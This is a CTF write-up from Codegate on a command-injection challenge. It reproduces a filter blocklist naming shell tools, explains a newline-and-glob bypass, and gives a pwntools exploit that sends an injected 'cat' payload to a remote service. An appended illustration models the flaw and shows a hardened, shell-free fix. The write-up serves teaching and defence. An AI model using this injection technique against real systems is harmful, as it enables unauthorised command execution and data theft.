Is this the vulnerable library?
We have one executable, 20000, and 20000 shared libs in the
The main executable will let you choose which of the 20000 libs to actually load, then run the
At first look, most of the libs just immediately end execution with a call to exit. With a combination of testing all libs automatically and dumb luck, we noticed that the lib_2035.so lib calls system("ls %s") with our input, instead of just exiting.
lib_2035.so, though, loads and runs lib_5163.so, which prevents us from using the following characters and strings:
; * | & $ ` > < r v m p d "bin" "sh" "bash" f l g
Even with the filter, injecting arbitrary shell commands is easy: we just need to add an end-of-line character (\n), which is not on the blocklist and terminates the ls command. To read the flag file we can just use globbing and bypass the f, l, g filter.
```python
#!/usr/bin/env python2
from pwn import *

with remote('18.104.22.168', 15959) as p:
    p.recvuntil('INPUT : ')
    p.sendline('2035')          # load lib_2035.so, the one that calls system("ls %s")
    p.recvuntil('file')
    p.sendline('"\ncat ????')   # newline ends the ls command; ???? globs the flag name without f/l/g
    p.interactive()
```
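As an added illustration, not part of the original writeup and not the challenge's own code, the following Python models the lib_5163.so blocklist as the writeup describes it, shows why a newline turns the single "ls %s" argument into two shell commands, and puts a hardened version of the same directory listing beside it. The blocklist contents and the "ls %s" template come from the writeup; the sample directory, the allowlist pattern and the names blacklist_allows, shell_commands, safe_list and demo are assumptions made here.

```python
import os
import re
import subprocess
import tempfile

# Constructed approximation of the lib_5163.so blocklist as the writeup
# describes it; illustrative, not the library's actual code.
BLOCKED_CHARS = set(';*|&$`><rvmpdflg')
BLOCKED_WORDS = ("bin", "sh", "bash")

# The format string the writeup reports being handed to system().
CMD_TEMPLATE = "ls %s"


def blacklist_allows(user_input):
    """True if the blocklist would accept the input.

    Newline and '?' are not on the list, which is exactly the gap the
    writeup uses: a blocklist only covers what its author enumerated,
    while the shell's syntax is much larger.
    """
    if any(ch in BLOCKED_CHARS for ch in user_input):
        return False
    return not any(word in user_input for word in BLOCKED_WORDS)


def shell_commands(user_input):
    """Return the separate command lines sh would see after formatting.

    Splits only on newline, the separator the blocklist missed; enough
    to show that one 'argument' has become two commands.
    """
    rendered = CMD_TEMPLATE % user_input
    return [line for line in rendered.split("\n") if line.strip()]


# Hardened version: never hand user input to a shell. Validate against an
# allowlist (assumed pattern) and pass it as one argv element, so nothing
# in it can be re-parsed as shell syntax.
SAFE_NAME = re.compile(r"[A-Za-z0-9._-]+")


def safe_list(name, base_dir):
    """List `name` inside `base_dir` without a shell; returns the entries."""
    if not SAFE_NAME.fullmatch(name) or name in (".", ".."):
        raise ValueError("rejected path component: %r" % name)
    result = subprocess.run(
        ["ls", "--", name],        # argv list: no shell, no re-parsing
        cwd=base_dir,
        capture_output=True,
        text=True,
        check=True,
    )
    return result.stdout.split()


def demo():
    """Run both versions against the writeup's payload; returns a summary."""
    payload = '"\ncat ????'
    summary = {
        "blacklist_passes_payload": blacklist_allows(payload),
        "commands_seen_by_shell": shell_commands(payload),
    }
    with tempfile.TemporaryDirectory() as base:
        os.mkdir(os.path.join(base, "data"))
        for fname in ("a.txt", "b.txt"):   # constructed sample files
            open(os.path.join(base, "data", fname), "w").close()
        summary["hardened_listing"] = safe_list("data", base)
        try:
            safe_list(payload, base)
            summary["hardened_rejects_payload"] = False
        except ValueError:
            summary["hardened_rejects_payload"] = True
    return summary


if __name__ == "__main__":
    for key, value in demo().items():
        print("%-26s %r" % (key, value))
```

The point of the comparison is that the filter is checking the wrong layer: as long as the input ends up inside a string given to system(), the shell decides what is syntax, and any character the filter forgot is a separator. Passing an argv list to subprocess.run removes the shell from the path entirely, and the allowlist then only has to describe what a legitimate file name looks like.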
tags: codegate - ctf - mhackeroni - command-injection